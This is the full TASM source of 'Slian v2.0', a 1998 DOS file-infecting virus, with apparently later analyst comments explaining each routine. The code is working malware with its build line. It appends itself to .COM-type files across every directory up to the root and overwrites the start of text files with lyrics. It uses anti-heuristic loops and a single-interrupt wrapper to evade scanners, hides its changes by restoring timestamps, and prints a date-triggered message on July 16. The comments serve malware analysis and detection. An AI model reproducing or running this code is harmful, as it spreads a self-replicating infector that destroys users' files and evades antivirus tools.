; ------------------------------------------------------------------------- ;
|
|
; Slian v2.0 coded by KilJaeden of the Codebreakers 1998 ;
|
|
; ------------------------------------------------------------------------- ;
|
|
; Description: ;
|
|
; ;
|
|
; v1.0 - start with *.com appender - great tutorials Horny Toad! CB #1,2,3 ;
|
|
; v1.1 - add a anti-heuristic loop - Ars0nic's article in Codebreakers #3 ;
|
|
; v1.2 - add no bigger, no smaller - Opic's Virus-Addons article in CB #3 ;
|
|
; v1.3 - add directory traversal - thankz to SPo0ky / Opic for this :) ;
|
|
; v1.4 - add date activated p-load - Opic's Virus-Addons article in CB #3 ;
|
|
; v1.5 - add *.txt file overwriter - great tutorials Horny Toad! CB #1,2,3 ;
|
|
; v1.6 - optimize my code a little - thanks Opic :) ;
|
|
; v1.7 - add anti-heuristic tricks - Ars0nic's article in Codebreakers #3 ;
|
|
; v1.8 - add appending of any file - Sea4's Nautilus Virus ;
|
|
; v1.9 - add overwrite of any file - thanks again Sea4 hehe ;
|
|
; v2.0 - add date/time restoration - thankz again Opic man :) ;
|
|
; ------------------------------------------------------------------------- ;
|
|
; -----------> Dedicated to Christine Moore, I'll be back soon! <---------- ;
|
|
; ------------------------------------------------------------------------- ;
|
|
; to compile ::] tasm slian.asm ;
|
|
; to link :::::] tlink /t slian.obj ;
|
|
; ------------------------------------------------------------------------- ;
|
|
|
|
; [analysis] TASM/MASM syntax, not NASM: `assume`, `dup (?)`, `label near`
; and `word ptr` are MASM-family directives, and the header gives
; tasm / tlink /t as the build line. Tiny model: one segment, cs = ds,
; image loaded at PSP:100h as a DOS .COM. Every DOS service below is
; reached through the do_it wrapper (int 21h).
code segment                            ; name our segment "code"
assume cs:code,ds:code                  ; assign cs and ds to code
org 100h                                ; a .com file
|
|
|
|
; [analysis] Entry stub. In the first-generation image the displacement is
; 0, so execution falls through to real_start. In an infected host the
; three bytes at 100h are the patched `newjump` (E9 + [size-3]), so control
; first lands on the appended body; the host's own first three bytes travel
; in `thrbyte` and are put back at 100h by the code after get_delta.
start:
        db 0e9h,0,0                     ; define a blank jump
|
|
|
|
; [analysis] Emulator-exhaustion loop (the "anti-heuristic loop" of v1.1):
; cx = 65535 iterations of jmp/loop that do no work. The mov ax,4c00h /
; call do_it pair between the two labels is never executed; a scanner that
; reads the code linearly, or emulates only a bounded number of
; instructions, sees a benign terminate call and stops before the
; infection routine below.
real_start:
        mov cx,0ffffh                   ; from other anti-heuristics

anti_one:
        jmp anti_two                    ; jump to anti two
        mov ax,4c00h                    ; terminate program (dead code, never reached)
        call do_it                      ; make it so DOS!

anti_two:
        loop anti_one                   ; loop anti_one
|
|
|
|
;call_delta:
; [analysis] Delta-offset computation. The body is appended at a different
; file offset in every host, so assembled offsets are wrong at run time;
; call/pop yields the actual address of get_delta and subtracting the
; assembled offset gives bp = relocation delta, used as [bp+label] below.
        call get_delta                  ; push IP on to stack

get_delta:
        pop bp                          ; pop it into bp
        sub bp,offset get_delta         ; get the delta offset

;first_three:
; [analysis] Restore the host's original three entry bytes at 100h and push
; 100h so the final `retn` (end_virus) transfers control to the host. In
; the first-generation image thrbyte holds CD 20 (int 20h), so that run
; simply terminates once the directory walk is done.
        mov cx,3                        ; counter set to three
        lea si,[bp+offset thrbyte]      ; where to write them
        mov di,100h                     ; start address
        push di                         ; save it for retn
        rep movsb                       ; do until cx = 0

;move_dta:
; [analysis] int 21h/1Ah: point the DTA at a buffer inside the body so the
; find-first/find-next record (file size at +1Ah, name at +1Eh, as used
; below) is addressable through bp.
        lea dx,[bp+offset dta]          ; where to move it
        mov ah,1ah                      ; move the dta
        call do_it                      ; make it so DOS!
|
|
|
|
; [analysis] int 21h/4Eh find-first with mask "*.c*" (comfile) and cx = 7
; (read-only | hidden | system), so hidden and system files are candidates
; too. `next` is also the re-entry point for find-next (4Fh) from
; close_file. CF set = no more matches -> second pass over text files.
get_one:
        mov ah,4eh                      ; find first file
        lea dx,[bp+comfile]             ; load *.com
        mov cx,7                        ; all attributes

next:
        call do_it                      ; make it so DOS!
        jnc open_file                   ; found one? open it
        jmp find_txt                    ; no .com left? .txt now
|
|
|
|
; [analysis] Directory walk: int 21h/3Bh chdir ".." then repeat the search
; in the parent. chdir fails (CF) only at the root, which is the sole path
; to pld_chk. Net effect of one run: every directory from the starting
; directory up to the root is visited, and the process ends in the root.
next_dir:
        lea dx,[bp+dot_dot]             ; load effective address ..
        mov ah,3bh                      ; directory changing
        call do_it                      ; make it so DOS!
        jnc get_one                     ; and find first again
        jmp pld_chk                     ; hit root, payload time?
|
|
|
|
; [analysis] Per-file setup. Attributes are cleared with int 21h/4301h,
; cx = 0, so read-only/hidden/system files can be opened for write. Unlike
; the timestamp, the attributes are never restored: a file whose
; attributes vanished while its date/time stayed put is an artifact worth
; looking for on a suspected machine.
open_file:
        lea dx,[bp+dta+1eh]             ; filename in DTA
        mov ax,4301h                    ; set file attributes
        xor cx,cx                       ; to absolutely none
        call do_it                      ; make it so DOS!

        mov ax,3d02h                    ; open the file read/write
        lea dx,[bp+offset dta+1eh]      ; get the file name info
        call do_it                      ; make it so DOS!
        xchg ax,bx                      ; move the file info (handle -> bx)

; [analysis] int 21h/5700h: save the host's time (dx) and date (cx) so
; close_file can write them back and the modification stamp is unchanged.
        mov ax,5700h                    ; get time/date stamps
        call do_it                      ; make it so DOS!
        mov [bp+time_cm],dx             ; save the values here
        mov [bp+date_cm],cx             ; save the values here

;record_three:
; [analysis] Read the host's first three bytes into thrbyte; they are
; written out with the body and restored at 100h when the host runs.
        mov ah,3fh                      ; the read / record function
        lea dx,[bp+thrbyte]             ; where to record too
        mov cx,3                        ; how much to record
        call do_it                      ; make it so DOS!

;file_check:
; [analysis] Infection marker ("no bigger, no smaller" in the header):
; thrbyte+1 is the displacement of the host's current first jmp. If
; displacement + body length + 3 equals the file size (DTA+1Ah, low word)
; the file already carries this body and is closed untouched.
        mov ax,word ptr [bp+dta+1ah]    ; get file size
        mov cx,word ptr [bp+thrbyte+1]  ; get three bytes
        add cx,finished-real_start+3    ; get virus and jump size
        cmp ax,cx                       ; compare the two
        jz close_file                   ; if equal, close file
|
|
|
|
;too_big:
; [analysis] Size gates (unsigned compares on the low size word): files
; above 61440 bytes are skipped so the appended image stays within a 64K
; .COM, and files below 1024 bytes are skipped as well. Both limits are
; fixed characteristics of this sample.
        cmp word ptr [bp+dta+1ah],61440 ; > then 61440d bytes?
        jna too_small                   ; not too big, too small?
        jmp close_file                  ; too big, close it up

too_small:
        cmp word ptr [bp+dta+1ah],1024  ; < then 1024d bytes?
        jnb new_jump                    ; not too small, continue
        jmp close_file                  ; too small, close it up
|
|
|
|
; [analysis] Build the new entry jump: a near jmp at 100h with
; displacement size-3 lands at 103h + (size-3) = 100h + size, i.e. the
; first byte of the appended body.
new_jump:
        sub ax,3                        ; file size - 3 bytes
        mov word ptr [bp+newjump+1],ax  ; write as new jump

;point_to_begin:
; [analysis] int 21h/4200h seek to offset 0, then 40h writes the 3-byte
; jump over the host's entry.
        mov ax,4200h                    ; point to start of file
        xor cx,cx                       ; cx to 0
        xor dx,dx                       ; dx to 0
        call do_it                      ; make it so DOS!

;write_jump:
        mov ah,40h                      ; write to file
        mov cx,3                        ; three bytes
        lea dx,[bp+newjump]             ; write this
        call do_it                      ; make it so DOS!

;point_to_end:
; [analysis] 4202h seek to end, then append real_start..finished. The DTA
; buffer lies after `finished` and is not part of the written image; the
; saved thrbyte and the patched newjump are, so each copy carries its own
; host's original entry bytes.
        mov ax,4202h                    ; point to end of file
        xor cx,cx                       ; cx to 0
        xor dx,dx                       ; dx to 0
        call do_it                      ; make it so DOS!

;write_body:
        mov ah,40h                      ; write to file
        lea dx,[bp+real_start]          ; what to write
        mov cx,finished-real_start      ; how much to write
        call do_it                      ; make it so DOS!
|
|
|
|
; [analysis] Shared exit for infected and skipped files: int 21h/5701h
; writes the saved time/date back (so timestamp-based change checks do not
; notice the append), 3Eh closes the handle, then 4Fh find-next re-enters
; the loop at `next`.
close_file:
        mov ax,5701h                    ; restore time/date stamps
        mov dx,[bp+time_cm]             ; from this value
        mov cx,[bp+date_cm]             ; and this value
        call do_it                      ; make it so DOS!

        mov ah,3eh                      ; close up the file
        call do_it                      ; make it so DOS!

;next_file:
        mov ah,4fh                      ; find next file
        jmp next                        ; and jump to next
|
|
|
|
; [analysis] Second pass over the same directory: the DTA is moved to 80h
; (the PSP default area, file name at 9Eh) and find-first runs with mask
; "*.tx*" and cx = 0 (normal attributes only). No match -> climb to the
; parent directory via next_dir.
find_txt:
        mov dx,80h                      ; move DTA to here
        mov ah,1ah                      ; move the DTA
        call do_it                      ; make it so DOS!
        mov ah,4eh                      ; find first file
        xor cx,cx                       ; cx to 0
        lea dx,txtfile                  ; load *.txt address

next_txt:
        call do_it                      ; make it so DOS!
        jnc open_txt                    ; found a .txt? open it
        jmp next_dir                    ; none found? next directory
|
|
|
|
; [analysis] Destructive pass. Same attribute-clear / open / timestamp-save
; sequence as open_file, then int 21h/40h with no prior seek, so
; txt_end-txt_start bytes are written at offset 0 of the freshly opened
; handle, replacing the start of the text file in place (bytes beyond that
; span are left as they were). The timestamp is restored afterwards, so
; the overwrite does not show in the file's date/time.
open_txt:
        mov dx,9eh                      ; filename in DTA
        mov ax,4301h                    ; set file attributes
        xor cx,cx                       ; to absolutely none
        call do_it                      ; make it so DOS!

        mov ax,3d02h                    ; open the file read/write
        mov dx,9eh                      ; get the file name info
        call do_it                      ; make it so DOS!
        xchg bx,ax                      ; move the file info (handle -> bx)

        mov ax,5700h                    ; get time/date stamps
        call do_it                      ; make it so DOS!
        mov [bp+time_tx],dx             ; save the values here
        mov [bp+date_tx],cx             ; save the values here

;infect_txt:
        mov ah,40h                      ; write to file
        lea dx,txt_start                ; where to start
        mov cx,txt_end-txt_start        ; how much to write
        call do_it                      ; make it so DOS!

;close_txt:
        mov ax,5701h                    ; restore time/date stamps
        mov dx,[bp+time_tx]             ; from this value
        mov cx,[bp+date_tx]             ; and this value
        call do_it                      ; make it so DOS!

        mov ah,3eh                      ; close the file
        call do_it                      ; make it so DOS!

;find_next:
        mov ah,4fh                      ; find next .txt file
        jmp next_txt                    ; and go again
|
|
|
|
; [analysis] Return to host: pops the 100h pushed after get_delta, where
; the original entry bytes were restored (int 20h in the first generation,
; the host's own code afterwards).
end_virus:
        retn                            ; return control to host
|
|
|
|
; [analysis] Trigger check, reached only once the walk hits the root:
; int 21h/2Ah returns month in dh and day in dl; the payload runs on
; July 16 only, on every other date control goes straight back to the host.
pld_chk:
        mov ah,2ah                      ; get system date
        call do_it                      ; make it so DOS!
        cmp dh,07                       ; is it July?
        je day_chk                      ; yes it is, check day now
        jmp end_virus                   ; nope, end virus

day_chk:
        cmp dl,16                       ; is it the 16th?
        je payload                      ; woohoo payload time!
        jmp end_virus                   ; nope, end virus
|
|
|
|
; [analysis] Payload: int 21h/09h prints the '$'-terminated pld_msg, then
; int 17h/01h initialises printer port 0 (dx) and int 17h/00h sends each
; byte of string1..endstring1 to it. string1 and pld_msg label the same
; address, so the printed range includes the trailing '$'. Observable
; effect is a screen message plus printer output; no file changes here.
payload:
        mov ah,09h                      ; print a message to screen
        lea dx,[bp+pld_msg]             ; the message
        call do_it                      ; make it so DOS!
        mov ah,01h                      ; start printer <grin>
        mov dx,0h                       ; put 0h into dx
        int 17h                         ; printer int
        lea si,string1                  ; where to start
        mov cx,endstring1-string1       ; how much to write

print_message:
        mov ah,00h                      ; write characters
        lodsb                           ; load a byte
        int 17h                         ; printer int
        loop print_message              ; loop until done
        jmp end_virus                   ; and end the virus
|
|
|
|
; [analysis] The single int 21h site, reached through call/ret. Every DOS
; service above goes through here, so the body contains one `int 21h`
; instead of one per service - presumably one of the v1.7 "anti-heuristic
; tricks", aimed at scanners that key on ah=xx / int 21h pairs.
do_it:
        int 21h                         ; make it so DOS!
        ret                             ; return from call
|
|
|
|
;data_area:
; [analysis] txt_start..txt_end is the LF-terminated block that open_txt
; writes over the start of matching text files; finding these lines at
; offset 0 of a .txt file is a direct indicator of this sample.
txt_start:
        db '',10
        db 'Need you, Dream you',10
        db 'Find you, Taste you',10
        db 'Fuck you, Use you',10
        db 'Scar you, Break you',10
        db 'Lose me, Hate me',10
        db 'Smash me, Erase me',10
        db '',10
txt_end:

; [analysis] string1 / pld_msg share one address: CR/LF-terminated lines
; ending in '$' for int 21h/09h; the same bytes go to the printer in
; print_message.
string1:
pld_msg db '',10,13
        db 'Happy Birthday Christine!',10,13
        db 'Your As Beautiful As Ever',10,13,'$'
endstring1:
|
|
|
|
; [analysis] Replicated state. time_*/date_* hold the stamps between 5700h
; and 5701h. Masks: "*.c*" matches any extension beginning with "c" (.com
; but also .c, .cpp, ...), "*.tx*" any beginning with "tx". thrbyte is
; CD 20 (int 20h) in the first generation and the host's real entry bytes
; in every later copy. `finished` bounds the image written by write_body;
; the 42-byte DTA after it is runtime scratch and is not written to hosts.
time_cm dw 0h                           ; .com time stamp goes here
time_tx dw 0h                           ; .txt time stamp goes here
date_cm dw 0h                           ; .com date stamp goes here
date_tx dw 0h                           ; .txt date stamp goes here
dot_dot db "..",0                       ; define the .. string
comfile db "*.c*",0                     ; define the *.com string
txtfile db "*.tx*",0                    ; define the *.txt string
thrbyte db 0cdh,20h,0                   ; terminates on first run
newjump db 0e9h,0,0                     ; blank jump on first run
finished label near                     ; an offset label (end of replicated image)
dta db 42 dup (?)                       ; set up space for DTA
code ends                               ; end code segment
end start                               ; end / where to start
|
|
|
|
; ------------------------------------------------------------------------- ;
|
|
; ----------> How Can You Think Freely In The Shadow Of A Church <--------- ;
|
|
; ------------------------------------------------------------------------- ;
|
|
|